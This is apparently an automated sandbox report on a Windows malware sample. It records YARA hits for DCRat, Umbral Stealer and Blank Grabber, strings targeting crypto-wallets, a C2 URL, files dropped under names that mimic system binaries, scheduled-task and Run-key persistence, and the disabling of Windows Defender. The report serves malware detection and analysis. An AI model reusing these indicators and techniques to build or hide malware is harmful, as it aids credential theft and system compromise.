                        Source: Yara matchFile source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                        Yara detected DCRat
                        Source: Yara matchFile source: 0000002C.00000002.1947296388.0000000002774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002C.00000002.1947296388.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: portrefNet.exe PID: 7300, type: MEMORYSTR
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: Yara matchFile source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                        Yara detected DCRat
                        Source: Yara matchFile source: 0000002C.00000002.1947296388.0000000002774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002C.00000002.1947296388.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: portrefNet.exe PID: 7300, type: MEMORYSTR
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information12
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		12
                        Scripting                        		1
                        DLL Side-Loading                        		21
                        Disable or Modify Tools                        		1
                        Credential API Hooking                        		1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        Bypass User Account Control                        		11
                        Deobfuscate/Decode Files or Information                        		LSASS Memory3
                        File and Directory Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		1
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		11
                        Process Injection                        		21
                        Obfuscated Files or Information                        		Security Account Manager248
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Credential API Hooking                        		2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron31
                        Registry Run Keys / Startup Folder                        		1
                        Scheduled Task/Job                        		21
                        Software Packing                        		NTDS651
                        Security Software Discovery                        		Distributed Component Object ModelInput Capture12
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script31
                        Registry Run Keys / Startup Folder                        		1
                        Timestomp                        		LSA Secrets1
                        Process Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials161
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Bypass User Account Control                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job233
                        Masquerading                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Modify Registry                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron161
                        Virtualization/Sandbox Evasion                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                        Process Injection                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545204 Sample: FixTsDfhiC.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 80 ip-api.com 2->80 94 Suricata IDS alerts for network traffic 2->94 96 Found malware configuration 2->96 98 Malicious sample detected (through community Yara rule) 2->98 100 19 other signatures 2->100 12 FixTsDfhiC.exe 3 2->12         started        signatures3 process4 file5 76 C:\Users\user\AppData\...\Lunch LaCheatV2.exe, PE32 12->76 dropped 78 C:\Users\user\...\windows defender.bat, ASCII 12->78 dropped 130 Creates processes via WMI 12->130 16 Lunch LaCheatV2.exe 2 12->16         started        20 cmd.exe 1 12->20         started        signatures6 process7 file8 58 C:\Users\user\AppData\...\Lunch LaCheat.exe, PE32 16->58 dropped 84 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->84 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->86 88 Hides threads from debuggers 16->88 22 Lunch LaCheat.exe 3 16->22         started        90 Uses cmd line tools excessively to alter registry or file data 20->90 92 Uses schtasks.exe or at.exe to add and modify task schedules 20->92 26 reg.exe 1 1 20->26         started        28 reg.exe 1 1 20->28         started        30 reg.exe 1 1 20->30         started        32 28 other processes 20->32 signatures9 process10 file11 72 C:\Users\user\AppData\...\DCRatBuild.exe, PE32 22->72 dropped 74 C:\Users\user\AppData\...\52cheatand52rat.exe, PE32 22->74 dropped 116 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->116 118 Found many strings related to Crypto-Wallets (likely being stolen) 22->118 120 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->120 122 Hides threads from debuggers 22->122 34 DCRatBuild.exe 3 7 22->34         started        38 52cheatand52rat.exe 14 3 22->38         started        124 Disables Windows Defender (deletes autostart) 26->124 126 Disable Windows Defender real time protection (registry) 26->126 signatures12 process13 dnsIp14 60 C:\blockweb\portrefNet.exe, PE32 34->60 dropped 62 C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe, data 34->62 dropped 102 Antivirus detection for dropped file 34->102 104 Multi AV Scanner detection for dropped file 34->104 106 Machine Learning detection for dropped file 34->106 41 wscript.exe 1 34->41         started        44 wscript.exe 34->44         started        82 ip-api.com 208.95.112.1, 49731, 80 TUT-ASUS United States 38->82 46 WMIC.exe 38->46         started        file15 signatures16 process17 signatures18 128 Windows Scripting host queries suspicious COM object (likely to drop second stage) 41->128 48 cmd.exe 41->48         started        50 conhost.exe 46->50         started        process19 process20 52 portrefNet.exe 48->52         started        56 conhost.exe 48->56         started        file21 64 C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe, PE32 52->64 dropped 66 C:\blockweb\WmiPrvSE.exe, PE32 52->66 dropped 68 C:\blockweb\RuntimeBroker.exe, PE32 52->68 dropped 70 13 other malicious files 52->70 dropped 108 Antivirus detection for dropped file 52->108 110 Multi AV Scanner detection for dropped file 52->110 112 Creates an undocumented autostart registry key 52->112 114 6 other signatures 52->114 signatures22

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        FixTsDfhiC.exe92%ReversingLabsWin32.Trojan.Dorv
                        FixTsDfhiC.exe100%AviraTR/Crypt.XPACK.Gen
                        FixTsDfhiC.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\blockweb\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
                        C:\blockweb\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
                        C:\Windows\AppReadiness\dwm.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Users\user\AppData\Local\Temp\Nu8jJRNGRr.bat100%AviraBAT/Delbat.C
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe100%AviraHEUR/AGEN.1307507
                        C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%AviraVBS/Runner.VPG
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Users\Default\ApplicationFrameHost.exe100%AviraHEUR/AGEN.1323984
                        C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe100%AviraVBS/Runner.VPG
                        C:\blockweb\portrefNet.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\blockweb\WmiPrvSE.exe100%Joe Sandbox ML
                        C:\blockweb\RuntimeBroker.exe100%Joe Sandbox ML
                        C:\Windows\AppReadiness\dwm.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Users\Default\ApplicationFrameHost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\blockweb\portrefNet.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Users\Default\ApplicationFrameHost.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe84%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        C:\Users\user\AppData\Local\Temp\DCRatBuild.exe66%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                        C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe83%ReversingLabsWin32.Trojan.Vindor
                        C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe75%ReversingLabsWin32.Trojan.Vindor
                        C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Windows\AppReadiness\dwm.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\blockweb\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\blockweb\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\blockweb\portrefNet.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
                        C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crl.microsoft0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                        http://ip-api.com0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://cp91897.tw1.ru/@=MzY2MWOkV2Ntrue
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/Blank-c/Umbral-Stealer52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpfalse
                              		unknown
                              https://discord.com/api/v10/users/52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                		unknown
                                http://crl.microsoft52cheatand52rat.exe, 00000024.00000002.1876249048.00000239D5E8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD548000.00000004.00000800.00020000.00000000.sdmp, portrefNet.exe, 0000002C.00000002.1947296388.000000000279D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ip-api.com/json/?fields=225545Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                  		unknown
                                  http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                    		unknown
                                    https://discordapp.com/api/v9/users/Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                      		unknown
                                      http://ip-api.com52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5CA000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      208.95.112.1
                                      		ip-api.comUnited States
                                      		53334TUT-ASUStrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1545204
                                      Start date and time:2024-10-30 08:41:10 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 28s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:46
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:FixTsDfhiC.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:BBD6FFDB33259778F08704696A04891F.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@87/43@1/1
                                      EGA Information:
                                      • Successful, ratio: 33.3%
                                      HCA Information:
                                      • Successful, ratio: 57%
                                      • Number of executed functions: 170
                                      • Number of non-executed functions: 94
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 216.58.206.35
                                      • Excluded domains from analysis (whitelisted): vh436.timeweb.ru, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, cp91897.tw1.ru, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target 52cheatand52rat.exe, PID 8100 because it is empty
                                      • Execution Graph export aborted for target portrefNet.exe, PID 7300 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • VT rate limit hit for: FixTsDfhiC.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      03:42:17API Interceptor1x Sleep call for process: WMIC.exe modified
                                      03:42:19API Interceptor1x Sleep call for process: 52cheatand52rat.exe modified
                                      07:42:26Task SchedulerRun new task: ApplicationFrameHost path: "C:\Users\Default User\ApplicationFrameHost.exe"
                                      07:42:26Task SchedulerRun new task: ApplicationFrameHostA path: "C:\Users\Default User\ApplicationFrameHost.exe"
                                      07:42:26Task SchedulerRun new task: dwm path: "C:\Windows\AppReadiness\dwm.exe"
                                      07:42:26Task SchedulerRun new task: dwmd path: "C:\Windows\AppReadiness\dwm.exe"
                                      07:42:26Task SchedulerRun new task: RuntimeBroker path: "C:\blockweb\RuntimeBroker.exe"
                                      07:42:26Task SchedulerRun new task: RuntimeBrokerR path: "C:\blockweb\RuntimeBroker.exe"
                                      07:42:26Task SchedulerRun new task: ukzoUeHPfeDwGdTDRNL path: "C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe"
                                      07:42:26Task SchedulerRun new task: ukzoUeHPfeDwGdTDRNLu path: "C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe"
                                      07:42:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe"
                                      07:42:28Task SchedulerRun new task: SgrmBroker path: "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
                                      07:42:28Task SchedulerRun new task: SgrmBrokerS path: "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
                                      07:42:28Task SchedulerRun new task: WmiPrvSE path: "C:\blockweb\WmiPrvSE.exe"
                                      07:42:28Task SchedulerRun new task: WmiPrvSEW path: "C:\blockweb\WmiPrvSE.exe"
                                      07:42:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"
